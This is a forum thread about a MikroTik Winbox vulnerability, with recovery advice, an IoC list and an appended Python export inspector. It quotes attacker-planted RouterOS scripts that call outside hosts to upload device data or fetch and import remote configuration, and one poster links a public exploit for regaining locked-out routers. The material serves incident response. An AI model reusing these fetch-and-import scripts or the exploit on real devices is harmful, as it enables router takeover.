Your firewall should not allow people to access your router.
As for someone who does not have the username and password of the specific Routerboard, is there the possibility of accessing it in root mode and exploiting this vulnerability?
Okay, so only people that have a username and password can exploit the vulnerability? Or can anyone get root access through the vulnerability even if they do not have a username and password for the Routerboard?
If you have updated RouterOS, nobody can exploit this vulnerability.
Thanks, I was hoping for such an update.
As already reported multiple times, in April 2018 MikroTik fixed a vulnerability in the Winbox server component which allowed an attacker to gain access to your RouterOS device if the Winbox port was opened to untrusted networks. Most MikroTik devices include a default firewall that prevents this, but for various reasons the firewall is sometimes turned off by the user.
The issue was already fixed, but a new method of exploitation has recently been revealed, so we urge all MikroTik users to upgrade their RouterOS versions.
Note: THIS IS THE SAME ISSUE THAT WAS ALREADY FIXED IN APRIL. Only a new way to use the same vulnerability was revealed now.
More details here: https://blog.mikrotik.com/security/new- ... ility.html
Please share this link with colleagues, employees, customers and other MikroTik users.
Thanks!
Cassio, please read the blog entry that was linked in the first post. It answers all your questions and more:
https://blog.mikrotik.com/security/winb ... ility.html
We should have automatic security updates. Security updates are different from feature upgrades, and for mission-critical devices such as routers, security updates should be included.
I don't agree with "automatic update"; we already have too many problems with Windows 10 (like the last update that erased a lot of data?). We don't want that with MikroTik. I need to trust my rigs, and I know I trust MikroTik as it is now.
Automatic security upgrades can ONLY be implemented if they can be disabled. Opt-out MUST be possible.
Hi All,
I updated my RouterOS from v6.41 to v643.2, updated Winbox to the current version, updated the admin password, and still the hacker was able to get full control of the system, locking me out.
What's the way out again?
If the attacker scans your ports, he will find the new port number too. Upgrade anyway!
It is highly probable that the attacker installed some stealth script which allows her to regain control. The only way out is to netinstall the router (during that process the router's NAND storage is formatted) and then configure the router from scratch. It is vital not to use a backup to restore the configuration; a text export can be handy when configuring ... but be careful not to copy any configuration bit for which you're not sure why it's there.
Ok! That is cool. I have a backup copy of the /export file; I will reload the script from scratch as a security measure.
Before loading the exported configuration, do inspect it in case it contains something suspicious.
Sure! I will check it well.
I have a question regarding the Winbox connection mode: is it highly secure or not at all? Is it an SSH or telnet connection?
If we say the Winbox connection is SSH, why do I see this in my logs?
Yes, I saw it. What does that mean? An SSH or telnet connection via Winbox?
After you've connected with Winbox and then click on "New Terminal", you'll see "user logged in via telnet" messages.
Thanks for the link.
If your user account has been disabled, then Netinstall is the only option.
Hi, we have hundreds of MikroTik CPEs with public static IPs; fortunately, only a few of them (5) have a RouterOS version affected by the vulnerability. They came from the factory with RouterOS 6.40.3, and a few hours after installation someone used the vulnerability to change the password and lock us out. In our configuration we also have a scheduled script that grabs the configuration from one of our servers once a day, but they disabled it too...; so my question is, is there any way to bring back control of these CPEs remotely, or is the only way to do it locally with Netinstall?
If it is an old RouterOS and you get "bad password", it means you have access to the vulnerable Winbox service.
All you need to do is try the Proof of Concept: https://github.com/BasuCert/WinboxPoC It is really simple to use; all you need is python3 installed and the IP/MAC of the device.
Someone hacked your device? Hack it back for yourself!
add name=ip owner=admin policy=\
reboot,read,write,policy,test,password,sniff,sensitive source="{/tool fetch \
url=(\"http://www.boss-ip.com/Core/Update.ashx\\\?key=5bc24d5c0d21bf27&actio\
n=upload&sncode=EBD7A5565C5BA8CA22063E65F05533F2&dynamic=static\") keep-res\
ult=no}"
Look to see if you have any scripts, files, usernames, PPP secrets or scheduled jobs from the IoCs at the end of this article; if so, delete them. Start with the scheduler, as these tasks could be re-run, leading to re-configuration of the router again.
Disable web proxy and SOCKS (if you don't need them; otherwise check their configuration), and check the firewall rules.
In the Tools menu, check the packet sniffer.
If you don't use the PPTP server functionality, turn it off.
Check all user accounts, remove all suspicious ones, and set a strong password for the rest of them.
Now UPDATE THE FIRMWARE of the router to the latest version.
:do {/tool fetch url="http://meaghan.pythonanywhere.com/" dst-path=tmp} on-error={:put "get http error"};
/import tmp;
/file remove tmp;
Domains:
gazanew.com
mining711.com
srcip.com
src-ips.com
srcips.com
hostingcloud.science
meaghan.pythonanywhere.com
Scheduled job names:
DDNS
CrtDDNS
UpDDNS
Setschedule[1-9]_
upd[113-116]
system[111-114]
ip
a
u[3-6]
User accounts known to be connected with campaigns:
toto
dodo
Files on router:
i113.rsc
i114.rsc
I116.rsc
exsvc.rsc
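The thread twice advises inspecting a text export before re-importing it and checking it against the IoC list above. As an added example (not code from the thread, from MikroTik, or from any poster), here is a small Python inspector that unwraps RouterOS export line continuations, walks the `add` entries by section, and flags known campaign names, attacker accounts, remote fetch/import in scripts or scheduler jobs, and IoC domains; the sample export is constructed and mirrors the fragment quoted above.

```python
import re

# Indicators as listed in the IoC section above; the bracketed ranges there
# (upd[113-116], system[111-114]) are read as numeric ranges.
IOC_DOMAINS = {"gazanew.com", "mining711.com", "srcip.com", "src-ips.com",
               "srcips.com", "hostingcloud.science", "meaghan.pythonanywhere.com"}
IOC_USERS = {"toto", "dodo"}
IOC_NAME_RE = re.compile(
    r"^(DDNS|CrtDDNS|UpDDNS|Setschedule[1-9]_|upd11[3-6]|system11[1-4]|ip|a|u[3-6])$")

def unwrap_export(text):
    """Join lines that a RouterOS export wrapped with a trailing backslash."""
    return re.sub(r"\\\r?\n\s*", "", text)

def inspect_export(text):
    """Return (section, reason, line) for every suspicious 'add' entry."""
    findings, section = [], ""
    for raw in unwrap_export(text).splitlines():
        line = raw.strip()
        if line.startswith("/"):            # section header such as /system scheduler
            section = line
            continue
        if not line.startswith("add "):
            continue
        m = re.search(r'(?<![\w-])name=(?:"([^"]*)"|(\S+))', line)
        name = (m.group(1) or m.group(2)) if m else ""
        if section in ("/system scheduler", "/system script"):
            if IOC_NAME_RE.match(name):
                findings.append((section, "known campaign name " + name, line))
            if re.search(r"/tool fetch|/import", line):
                findings.append((section, "fetches or imports remote content", line))
        if section == "/user" and name in IOC_USERS:
            findings.append((section, "known attacker account " + name, line))
        for domain in IOC_DOMAINS:
            if domain in line:
                findings.append((section, "references IoC domain " + domain, line))
    return findings

# Constructed sample export (not from a real device): the planted script mirrors
# the export fragment quoted in the thread; the other entries are legitimate.
SAMPLE_EXPORT = r'''/system script
add name=ip owner=admin policy=\
    reboot,read,write,policy,test,password,sniff,sensitive source="{/tool fetch \
    url=(\"http://meaghan.pythonanywhere.com/\") keep-result=no}"
add name=nightly owner=admin policy=read source="/system backup save"
/user
add name=toto group=full
add name=ops group=full
'''
```

Running `inspect_export(SAMPLE_EXPORT)` yields four findings: three for the planted `ip` script (campaign name, remote fetch, IoC domain) and one for the `toto` account.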